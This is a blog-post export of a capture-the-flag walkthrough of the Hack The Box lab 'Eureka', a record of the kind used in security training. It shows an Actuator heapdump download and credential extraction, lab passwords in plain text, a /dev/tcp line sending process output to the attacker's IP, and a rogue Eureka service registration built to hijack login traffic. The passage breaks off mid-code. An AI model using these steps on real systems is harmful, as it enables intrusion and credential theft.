{"id":259,"date":"2025-05-02T13:59:14","date_gmt":"2025-05-02T05:59:14","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=259"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"259","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/05\/02\/259\/","title":{"rendered":"HTB Machine Eureka Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code>10.10.11.66<\/code><strong> (multiple IP addresses exist)<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.103.58 (10.129.103.58) 56(84) bytes of data.\n64 bytes from 10.129.103.58: icmp_seq=1 ttl=63 time=367 ms\n64 bytes from 10.129.103.58: icmp_seq=2 ttl=63 time=400 ms\n64 bytes from 10.129.103.58: icmp_seq=3 ttl=63 time=412 ms\n64 bytes from 10.129.103.58: icmp_seq=4 ttl=63 time=332 ms\n\n--- 10.129.103.58 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 331.549\/377.715\/411.705\/31.248 ms<\/code><\/pre>\n<p>Network connectivity between the attacking machine and the target is normal.<\/p>\n<h2>Firewall Detection<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Apr 27 07:34:32 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.103.58\nNmap scan report for 10.129.103.58\nHost is up (0.31s latency).\nAll 65535 scanned ports on 10.129.103.58 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Apr 27 07:35:18 2025 -- 1 IP address (1 host up) scanned in 45.06 
seconds<\/code><\/pre>\n<p>The firewall state of the target could not be determined.<\/p>\n<h2>Network Port Scanning<\/h2>\n<p><code>TCP<\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Apr 27 07:37:19 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.103.58\nWarning: 10.129.103.58 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.58\nHost is up (0.31s latency).\nNot shown: 64856 closed tcp ports (conn-refused), 676 filtered tcp ports (no-response)\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)\n|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)\n|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)\n80\/tcp   open  http    nginx 1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/furni.htb\/\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n8761\/tcp open  http    Apache Tomcat (language: en)\n|_http-title: Site doesn't have a title.\n| http-auth: \n| HTTP\/1.1 401 x0D\n|_  Basic realm=Realm\nDevice type: general purpose\nRunning: Linux 5.X\nOS CPE: cpe:\/o:linux:linux_kernel:5.0\nOS details: Linux 5.0, Linux 5.0 - 5.14\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   354.00 ms 10.10.14.1\n2   354.17 ms 10.129.103.58\n\nOS and Service detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Apr 27 07:38:34 2025 -- 1 IP address (1 host up) scanned in 74.98 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Apr 27 07:40:06 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.103.58\nWarning: 10.129.103.58 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.129.103.58\nHost is up (0.33s latency).\nAll 65535 scanned ports on 10.129.103.58 are in ignored states.\nNot shown: 65289 open|filtered udp ports (no-response), 246 closed udp ports (port-unreach)\n\n# Nmap done at Sun Apr 27 07:44:09 2025 -- 1 IP address (1 host up) scanned in 242.91 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong> detailed port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target runs <code>Ubuntu Linux<\/code> and exposes two <code>Web<\/code> services, <code>Nginx<\/code> and <code>Apache Tomcat<\/code>; the primary domain name appears to be <code>furni.htb<\/code>.<\/p>\n<hr \/>\n<h1>Service Enumeration<\/h1>\n<h2>SSH Service (Port 22)<\/h2>\n<p>Port <code>Banner<\/code>:<\/p>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/eureka]\n\u2514\u2500# nc -nv 10.129.103.58 22                                     \n(UNKNOWN) [10.129.103.58] 22 (ssh) open\nSSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12<\/code><\/pre>\n<h2>Web Application (Port 80)<\/h2>\n<p>Open the home page: <code>http:\/\/furni.htb\/<\/code><\/p>\n<p><img decoding=\"async\" 
src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745746218507-1f57a6fb-420f-45d5-96f2-6db4114f5461.png\" alt=\"\" \/><\/p>\n<p>The home page shows that the site is an online furniture ordering system.<\/p>\n<p>Start with a directory scan:<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Sun Apr 27 18:11:45 2025 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/furni.htb -x 400,403,404 -t 60 -e jsp,js,html,txt,zip,tar.gz,xml,json,pdf,pcap\n\n200    14KB  http:\/\/furni.htb\/about\n200     2KB  http:\/\/furni.htb\/actuator\n200    20B   http:\/\/furni.htb\/actuator\/caches\n200     2B   http:\/\/furni.htb\/actuator\/info\n200   467B   http:\/\/furni.htb\/actuator\/features\n405   114B   http:\/\/furni.htb\/actuator\/refresh\n200    54B   http:\/\/furni.htb\/actuator\/scheduledtasks\n200     3KB  http:\/\/furni.htb\/actuator\/metrics\n200    15B   http:\/\/furni.htb\/actuator\/health\n200     6KB  http:\/\/furni.htb\/actuator\/env\n200    35KB  http:\/\/furni.htb\/actuator\/mappings\n200    36KB  http:\/\/furni.htb\/actuator\/configprops\n200    99KB  http:\/\/furni.htb\/actuator\/loggers\n200   198KB  http:\/\/furni.htb\/actuator\/beans\n200   180KB  http:\/\/furni.htb\/actuator\/conditions\n200   478KB  http:\/\/furni.htb\/actuator\/threaddump\n200    76MB  http:\/\/furni.htb\/actuator\/heapdump\n200    13KB  http:\/\/furni.htb\/blog\n302     0B   http:\/\/furni.htb\/cart    -&gt; REDIRECTS TO: http:\/\/furni.htb\/login\n302     0B   http:\/\/furni.htb\/checkout    -&gt; REDIRECTS TO: http:\/\/furni.htb\/login\n302     0B   http:\/\/furni.htb\/comment    -&gt; REDIRECTS TO: http:\/\/furni.htb\/login\n200    10KB  http:\/\/furni.htb\/contact\n500    73B   http:\/\/furni.htb\/error\n200     2KB  http:\/\/furni.htb\/login\n200     1KB  http:\/\/furni.htb\/logout\n200     9KB  http:\/\/furni.htb\/register\n200    14KB  
http:\/\/furni.htb\/services\n200    12KB  http:\/\/furni.htb\/shop<\/code><\/pre>\n<p>The scan reveals an <code>API<\/code> endpoint, <code>\/actuator<\/code>, on the site; try accessing it directly:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745796696352-db94330e-2b2c-4f21-af77-ba443ce2f917.png\" alt=\"\" \/><\/p>\n<p>This is the application health-monitoring interface of the <code>Java SpringBoot<\/code> framework. Try the <code>\/actuator\/env<\/code> endpoint to retrieve the <code>SpringBoot<\/code> environment variable information:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745796907440-04d58efd-1a03-445a-b878-d7e9078e2fd9.png\" alt=\"\" \/><\/p>\n<p><strong>The target's <\/strong><code>Web<\/code><strong> service is vulnerable to unauthenticated access to its <\/strong><code>SpringBoot Actuator<\/code><strong> endpoints!<\/strong><\/p>\n<hr \/>\n<h1>Penetration Testing<\/h1>\n<h2>Exploiting Unauthenticated SpringBoot Actuator Access<\/h2>\n<p>During service enumeration, the <code>SpringBoot Actuator API<\/code> of the <code>Web<\/code> service was found to be misconfigured to allow unauthenticated access. This is now exploited.<\/p>\n<p>First, go through the <code>JSON<\/code> configuration keys returned by the <code>\/actuator\/env<\/code> endpoint one by one; the environment contains the <code>SpringBoot<\/code> database connection settings <code>spring.datasource.username<\/code> and <code>spring.datasource.password<\/code>:<\/p>\n<pre><code class=\"language-json\">{\n      \"name\": \"Config resource 'file 
[\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties]' via location '\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties'\",\n      \"properties\": {\n        \"spring.application.name\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 1:25\"\n        },\n        \"spring.session.store-type\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 2:27\"\n        },\n        \"spring.cloud.inetutils.ignoredInterfaces\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 3:42\"\n        },\n        \"spring.cloud.client.hostname\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 4:30\"\n        },\n        \"eureka.client.service-url.defaultZone\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 6:40\"\n        },\n        \"eureka.instance.hostname\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 7:26\"\n        },\n        \"eureka.instance.prefer-ip-address\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 8:35\"\n        },\n        \"spring.jpa.hibernate.ddl-auto\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 10:31\"\n        },\n        \"spring.datasource.url\": {\n          \"value\": \"******\",\n          \"origin\": \"URL 
[file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 11:23\"\n        },\n        \"spring.datasource.username\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 12:28\"\n        },\n        \"spring.datasource.password\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 13:28\"\n        },\n        \"spring.datasource.driver-class-name\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 14:37\"\n        },\n        \"spring.jpa.properties.hibernate.format_sql\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 15:44\"\n        },\n        \"server.address\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 17:16\"\n        },\n        \"server.port\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 18:13\"\n        },\n        \"server.forward-headers-strategy\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 20:33\"\n        },\n        \"management.endpoints.web.exposure.include\": {\n          \"value\": \"******\",\n          \"origin\": \"URL [file:\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties] - 22:43\"\n        }\n      }\n    
}<\/code><\/pre>\n<p>The response also shows that the <code>JavaWeb<\/code> configuration file is: <code>\/var\/www\/web\/Furni\/src\/main\/resources\/application.properties<\/code>.<\/p>\n<p>After reviewing the response from the <code>\/actuator\/env<\/code> endpoint, use <code>wget<\/code> to request the <code>\/actuator\/heapdump<\/code> endpoint and download a memory snapshot (heap dump) of the running <code>JVM<\/code>:<\/p>\n<pre><code class=\"language-shell\">wget http:\/\/furni.htb\/actuator\/heapdump -O springboot_heapdump<\/code><\/pre>\n<p>Once the download finishes, open the file with <code>Eclipse Memory Analyzer<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745802397597-ed184a02-46a0-4e15-a900-5bf8e24d9b3e.png\" alt=\"\" \/><\/p>\n<h2>Extracting Login Credentials from the JVM Heap Dump<\/h2>\n<p>With the heap dump open, click the <code>OQL<\/code> query editor button at the top of the right-hand pane to open the query page. Because the <code>\/actuator\/env<\/code> endpoint showed that the keys holding the <code>SpringBoot<\/code> database connection credentials are <code>spring.datasource.username<\/code> and <code>spring.datasource.password<\/code>, write an <code>OQL<\/code> query that selects the <code>java.util.LinkedHashMap$Entry<\/code> instances whose key contains <code>spring.datasource<\/code>:<\/p>\n<pre><code class=\"language-plsql\">select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains(&quot;spring.datasource&quot;))<\/code><\/pre>\n<p><img 
decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803207817-7459c543-d576-4aa4-9178-e9894836536d.png\" alt=\"\" \/><\/p>\n<p>The query returns the two keys <code>spring.datasource.username<\/code> and <code>spring.datasource.password<\/code>; click to expand them and view their values:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803462171-3caf27ec-5e84-42d0-8a9b-798c108ad32c.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803490118-f22ad33a-3c45-48a9-9d22-cc29fb7bbad7.png\" alt=\"\" \/><\/p>\n<p>Login credentials found:<\/p>\n<ul>\n<li>Username: <code>oscar190<\/code><\/li>\n<li>Password: <code>0sc@r190_S0l!dP@sswd<\/code><\/li>\n<\/ul>\n<p>Try logging in over <code>SSH<\/code> with these credentials:<\/p>\n<pre><code class=\"language-shell\">ssh oscar190@10.129.23.73<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1745803823187-340074e8-c6b6-47ec-bac3-1560ff7fe0cb.png\" alt=\"\" \/><\/p>\n<p><strong>Success!!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Directory Enumeration<\/h2>\n<p>After logging in, enumerate the file system. The target's <code>Web<\/code> service directories are under <code>\/var\/www\/web<\/code>, and there are several site directories:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746142766207-9a564990-3889-405c-a4a7-740320b4d11a.png\" alt=\"\" 
\/><\/p>\n<p>Browsing the <code>\/var\/www\/web\/Furni<\/code> directory, the <code>Web<\/code> service configuration file <code>application.properties<\/code> is found under <code>\/var\/www\/web\/Furni\/src\/main\/resources<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746142973332-9156e9e8-b7c3-435f-ba83-6f48a09d6e57.png\" alt=\"\" \/><\/p>\n<p>View its contents:<\/p>\n<pre><code class=\"language-plain\">spring.application.name=Furni\nspring.session.store-type=jdbc\nspring.cloud.inetutils.ignoredInterfaces=enp0s.*\nspring.cloud.client.hostname=localhost\n#Eureka\neureka.client.service-url.defaultZone= http:\/\/EurekaSrvr:0scarPWDisTheB3st@localhost:8761\/eureka\/\neureka.instance.hostname=localhost\neureka.instance.prefer-ip-address=false\n#Mysql\nspring.jpa.hibernate.ddl-auto=none\nspring.datasource.url=jdbc:mysql:\/\/localhost:3306\/Furni_WebApp_DB\nspring.datasource.username=oscar190\nspring.datasource.password=0sc@r190_S0l!dP@sswd\nspring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver\nspring.jpa.properties.hibernate.format_sql=true\n#tomcat\nserver.address=localhost\nserver.port=8082\n# Enable proxy support\nserver.forward-headers-strategy=native\n#A\nmanagement.endpoints.web.exposure.include=*<\/code><\/pre>\n<p>This reveals what appear to be the <code>HTTP Basic<\/code> authentication credentials for port <code>8761<\/code> on the target:<\/p>\n<ul>\n<li>Username: <code>EurekaSrvr<\/code><\/li>\n<li>Password: <code>0scarPWDisTheB3st<\/code><\/li>\n<\/ul>\n<p>In addition, a script named <code>log_analyse.sh<\/code> is found in the <code>\/opt<\/code> directory:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746143435717-19b8b76b-d734-44bd-9ccb-07bbcd4786d6.png\" alt=\"\" 
\/><\/p>\n<h2>Operating System Enumeration<\/h2>\n<p><strong>Basic system information<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144178455-7b023817-9870-47a8-a44a-2864b3970afc.png\" alt=\"\" \/><\/p>\n<p><strong>Process list<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144198798-f9b0fe66-47a0-4d70-8eb3-b4625053d1c0.png\" alt=\"\" \/><\/p>\n<p><strong>Scheduled tasks<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144204782-2a2887de-7ed8-4b10-aeb7-36a3a65cd26f.png\" alt=\"\" \/><\/p>\n<p><strong>Environment variables<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144212291-4a8f90c6-3f6a-4f74-bf6e-0c7f28bcbfeb.png\" alt=\"\" \/><\/p>\n<p><strong>User information<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144226759-f29b0cbf-9c1f-4ae9-87d6-e9e51fed4115.png\" alt=\"\" \/><\/p>\n<p><strong>User home directories<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144338559-fe73e148-4d1f-43bd-b417-bfc087b80938.png\" alt=\"\" \/><\/p>\n<p><strong>Files with special permissions<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144350554-a182eb28-dd58-4d1d-9961-689a1b244a72.png\" alt=\"\" \/><\/p>\n<p><strong>Open ports<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144353263-1a4abecb-bba9-4695-8a83-fb49e63b5db1.png\" alt=\"\" \/><\/p>\n<p><strong>Sensitive file permissions<\/strong><\/p>\n<p><img decoding=\"async\" 
src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144359170-c196b51c-e732-4f02-81d5-9d4c2b91f9ef.png\" alt=\"\" \/><\/p>\n<p><strong>Nginx site configuration<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746144391050-4ef03922-8a6d-4967-a713-ce7c7855c7b1.png\" alt=\"\" \/><\/p>\n<p>The <code>LinPeas<\/code> enumeration results show that port <code>80<\/code> on the target is actually pointed at local port <code>8080<\/code>, and that the target has a user named <code>miranda-wise<\/code>.<\/p>\n<p>Upload the <code>pspy32<\/code> tool to monitor system processes:<\/p>\n<pre><code class=\"language-shell\">scp -P 22222 megumin@10.10.14.2:\/usr\/share\/pspy\/pspy32 .\/pspy32\nchmod +x pspy32\n.\/pspy32 &gt;&amp; \/dev\/tcp\/10.10.14.2\/53 0&gt;&amp;1 &amp;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746145272720-65463f3b-9154-4934-94cf-8ecc78666480.png\" alt=\"\" 
\/><\/p>\n<p>The target periodically runs <code>curl<\/code> as <code>root<\/code> against the login endpoint of the <code>Furni<\/code> site, apparently performing a login; it also repeatedly invokes the <code>\/opt\/log_analyse.sh<\/code> script to summarize and analyze the two <code>Web<\/code> application logs <code>\/var\/www\/web\/user-management-service\/log\/application.log<\/code> and <code>\/var\/www\/web\/cloud-gateway\/log\/application.log<\/code>.<\/p>\n<p>The log file of the <code>user-management-service<\/code> project contains a large number of successful login records for the <code>miranda<\/code> user:<\/p>\n<pre><code class=\"language-plain\">2025-04-09T11:36:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:37:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:38:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:39:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:40:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully\n2025-04-09T11:41:01.878Z  INFO 1172 --- [USER-MANAGEMENT-SERVICE] [http-nio-127.0.0.1-8081-exec-1] 
c.e.Furni.Security.LoginSuccessLogger    : User 'miranda.wise@furni.htb' logged in successfully<\/code><\/pre>\n<p>Based on this analysis, port <code>8761<\/code> on the target, the script <code>miranda-Login-Simulator.sh<\/code> that periodically logs in as the <code>miranda<\/code> user, and the log analysis script <code>log_analyse.sh<\/code> are judged to form the privilege-escalation attack surface; privilege escalation proceeds from these three points.<\/p>\n<h2>Hijacking Microservice Traffic to Obtain Login Credentials<\/h2>\n<p>First, log in to the <code>Web<\/code> service on port <code>8761<\/code> of the target with the discovered credentials:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746146671050-6af8975e-2c72-44c0-82f4-68baaea54b99.png\" alt=\"\" \/><\/p>\n<p>Port <code>8761<\/code> on the target hosts the <code>Spring Cloud Netflix Eureka<\/code> microservice management system.<\/p>\n<blockquote><p><code>Spring Eureka<\/code> is a <code>SpringBoot<\/code> component for microservice management; it provides automatic registration, modification and removal of microservices, along with load-balanced access to them. <code>Spring Eureka<\/code> has a server side and a client side: the server is the <code>Eureka<\/code> service registry, and the client handles registering microservices with, and discovering them through, the <code>Eureka<\/code> service. In practice, an administrator can also log in to the <code>Spring Eureka 
API<\/code> and modify the configuration of microservices that have already registered automatically.<\/p><\/blockquote>\n<p>As shown, the <code>Web<\/code> service running on local port <code>8000<\/code> of the target is actually a <code>Web<\/code> routing application named <code>APP-GATEWAY<\/code>, whose job is to forward request traffic to different ports according to the requested <code>URL<\/code> path; ports <code>8001<\/code> and <code>8002<\/code> are the actual <code>Furni<\/code> online store and user management system.<\/p>\n<p>Since the <code>miranda-Login-Simulator.sh<\/code> script found during operating system enumeration periodically sends login requests to the <code>Furni<\/code> online store, the plan is to register a malicious microservice instance under the <code>FURNI<\/code> application that points to port <code>80<\/code> on the attacking machine, so that the login traffic sent by the script is hijacked to the attacking machine and the login credentials of the <code>miranda<\/code> user are captured.<\/p>\n<p>First, consult the <code>Netflix Eureka<\/code> documentation: <a href=\"https:\/\/github.com\/Netflix\/eureka\/wiki\/Eureka-REST-operations\" target=\"_blank\"  rel=\"nofollow\" >Eureka REST operations \u00b7 Netflix\/eureka Wiki<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1746148588138-e7fc543c-0a0d-470c-bf7c-00804f2f9561.png\" alt=\"\" 
\/><\/p>\n<p>The documentation shows that an administrator can retrieve the instance configuration of a given microservice application with a <code>GET<\/code> request to the <code>\/eureka\/apps\/&lt;appname&gt;<\/code> endpoint, and can add a new instance configuration with a <code>POST<\/code> request to the same endpoint. We request <code>http:\/\/furni.htb:8761\/eureka\/apps\/FURNI<\/code> to obtain the microservice configuration of the <code>Furni<\/code> online store:<\/p>\n<pre><code class=\"language-xml\">&lt;application&gt;\n  &lt;name&gt;FURNI&lt;\/name&gt;\n  &lt;instance&gt;\n    &lt;instanceId&gt;localhost:Furni:8082&lt;\/instanceId&gt;\n    &lt;hostName&gt;localhost&lt;\/hostName&gt;\n    &lt;app&gt;FURNI&lt;\/app&gt;\n    &lt;ipAddr&gt;10.10.11.66&lt;\/ipAddr&gt;\n    &lt;status&gt;UP&lt;\/status&gt;\n    &lt;overriddenstatus&gt;UNKNOWN&lt;\/overriddenstatus&gt;\n    &lt;port enabled=\"true\"&gt;8082&lt;\/port&gt;\n    &lt;securePort enabled=\"false\"&gt;443&lt;\/securePort&gt;\n    &lt;countryId&gt;1&lt;\/countryId&gt;\n    &lt;dataCenterInfo class=\"com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo\"&gt;\n      &lt;name&gt;MyOwn&lt;\/name&gt;\n    &lt;\/dataCenterInfo&gt;\n    &lt;leaseInfo&gt;\n      &lt;renewalIntervalInSecs&gt;30&lt;\/renewalIntervalInSecs&gt;\n      &lt;durationInSecs&gt;90&lt;\/durationInSecs&gt;\n      &lt;registrationTimestamp&gt;1746141792036&lt;\/registrationTimestamp&gt;\n      &lt;lastRenewalTimestamp&gt;1746148869868&lt;\/lastRenewalTimestamp&gt;\n      &lt;evictionTimestamp&gt;0&lt;\/evictionTimestamp&gt;\n      &lt;serviceUpTimestamp&gt;1746141792036&lt;\/serviceUpTimestamp&gt;\n    &lt;\/leaseInfo&gt;\n    &lt;metadata&gt;\n      &lt;management.port&gt;8082&lt;\/management.port&gt;\n    &lt;\/metadata&gt;\n    &lt;homePageUrl&gt;http:\/\/localhost:8082\/&lt;\/homePageUrl&gt;\n    
&lt;statusPageUrl&gt;http:\/\/localhost:8082\/actuator\/info&lt;\/statusPageUrl&gt;\n    &lt;healthCheckUrl&gt;http:\/\/localhost:8082\/actuator\/health&lt;\/healthCheckUrl&gt;\n    &lt;vipAddress&gt;Furni&lt;\/vipAddress&gt;\n    &lt;secureVipAddress&gt;Furni&lt;\/secureVipAddress&gt;\n    &lt;isCoordinatingDiscoveryServer&gt;false&lt;\/isCoordinatingDiscoveryServer&gt;\n    &lt;lastUpdatedTimestamp&gt;1746141792036&lt;\/lastUpdatedTimestamp&gt;\n    &lt;lastDirtyTimestamp&gt;1746141791516&lt;\/lastDirtyTimestamp&gt;\n    &lt;actionType&gt;ADDED&lt;\/actionType&gt;\n  &lt;\/instance&gt;\n&lt;\/application&gt;<\/code><\/pre>\n<p>Then, based on the returned <code>XML<\/code> configuration, write the following malicious microservice configuration in <code>JSON<\/code> format, pointing the instance address at port <code>80<\/code> of the attacking machine, and save it as <code>evil-instance.json<\/code>:<\/p>\n<pre><code 
class=\"language-json\">{\"instance\":{\"instanceId\":\"10.10.14.2:misaka19008:80\",\"app\":\"FURNI\",\"appGroupName\":null,\"ipAddr\":\"10.10.14.2\",\"sid\":\"na\",\"homePageUrl\":\"http:\/\/localhost:8082\/\",\"statusPageUrl\":\"http:\/\/localhost:8082\/actuator\/info\",\"healthCheckUrl\":\"http:\/\/localhost:8082\/actuator\/health\",\"secureHealthCheckUrl\":null,\"vipAddress\":\"Furni\",\"secureVipAddress\":\"Furni\",\"countryId\":1,\"dataCenterInfo\":{\"@class\":\"com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo\",\"name\":\"MyOwn\"},\"hostName\":\"10.10.14.2\",\"status\":\"UP\",\"overriddenStatus\":\"UNKNOWN\",\"leaseInfo\":{\"renewalIntervalInSecs\":30,\"durationInSecs\":90,\"registrationTimestamp\":0,\"lastRenewalTimestamp\":0,\"evictionTimestamp\":0,\"serviceUpTimestamp\":0},\"isCoordinatingDiscoveryServer\":false,\"lastUpdatedTimestamp\":1630906180645,\"lastDirtyTimestamp\":1630906182808,\"actionType\":null,\"asgName\":null,\"port\":{\"$\":80,\"@enabled\":\"true\"},\"securePort\":{\"$\":443,\"@enabled\":\"false\"},\"metadata\":{\"management.port\":\"8082\"}}}<\/code><\/pre>\n<p>Next, write an <code>HTTP<\/code> response packet, <code>response_heartbeat.data<\/code>, to serve as the heartbeat response data of the microservice:<\/p>\n<pre><code 